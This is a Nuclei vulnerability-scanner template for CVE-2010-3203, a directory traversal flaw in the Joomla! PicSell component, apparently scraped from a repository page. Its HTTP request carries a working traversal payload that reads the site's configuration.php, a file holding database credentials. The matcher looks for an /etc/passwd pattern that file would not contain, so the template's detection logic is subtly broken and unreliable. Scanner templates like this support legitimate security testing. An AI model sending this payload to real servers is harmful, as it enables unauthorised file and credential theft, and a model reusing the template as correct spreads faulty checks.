45 lines
1.7 KiB
YAML
45 lines
1.7 KiB
YAML
id: CVE-2010-3203
|
|
|
|
info:
|
|
name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server.
|
|
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/14845
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-3203
|
|
- http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/
|
|
- http://www.exploit-db.com/exploits/14845
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2010-3203
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00626
|
|
epss-percentile: 0.76748
|
|
cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: xmlswf
|
|
product: com_picsell
|
|
tags: cve,cve2010,edb,joomla,lfi,xmlswf
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022030007981511407dd6716097c70d2348b6e7f288e57d05a177e4f9ae0bcf607ef022100aa3436a7609d718ca4639083c1b39f8585519a8c27fd56f228a6af4a2cc3eedf:922c64590222798bb761d5b6d8e72950 |